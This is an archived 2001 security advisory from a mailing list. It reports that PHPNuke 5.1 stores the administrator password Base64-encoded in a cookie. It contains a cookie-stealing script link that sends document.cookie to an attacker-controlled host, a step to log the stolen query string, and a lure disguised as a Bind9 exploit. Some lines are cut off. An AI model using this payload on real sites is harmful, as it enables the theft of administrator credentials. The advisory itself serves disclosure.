[UNIX] PHPNuke Admin Password Can Be StolenFrom: email@example.com
- Previous message: firstname.lastname@example.org: "[NT] Windows Media Player .ASF Processor Buffer Overflow Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: email@example.com To: firstname.lastname@example.org Subject: [UNIX] PHPNuke Admin Password Can Be Stolen Message-Id: <20011125130805.4E536138BF@mail.der-keiler.de> Date: Sun, 25 Nov 2001 14:08:05 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
PHPNuke Admin Password Can Be Stolen
Vulnerabilities in PHPNuke expose the administrative password. The
vulnerability lies in PHPNuke's insecure storage of the administrator
password in a cookie.
PHPNuke version 5.1
To successfully exploit this vulnerability you will need to rely on two
Password BASE64 encoding:
The administrator login/password pair is stored in a cookie like this:
Furthermore, the administrator password is BASE64 encoded, making it very
easy to decode.
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:
About:URLS security vulnerability:
As we reported in a previous article:
<http://www.securiteam.com/windowsntfocus/6I00D1535I.html> Microsoft IE
Cookies Exposure via 'About:' URLS, a vulnerability in Internet Explorer
allows extraction of cookies stored on the remote connecting client (even
if they are not from our cookie domain).
First create a php script that can gather getenv("QUERY_STRING") in a
file. Then create this kind of link and force the PHPNuke administrator to
[script]window.open("http://www.yourwebsite.com/cook.php?"+document.cookie);[/script]"] Hey,this is the last Bind9 remote root exploit ![/a]
(replace [ & ] by )
www.nuked-site.com is the site that you want to get cookie of.
www.yourwebsute.com is the site that will receive the cookie thru the
If the nuked site's admin follow this link, he will send to your script
his cookie with the Base64 encoded password. Then you just have to decode
The information has been provided by
<mailto:aurelien.cabezon@iSecureLabs.com> Cabezon Aurelien.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: email@example.com
In order to subscribe to the mailing list, simply forward this email to: firstname.lastname@example.org
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.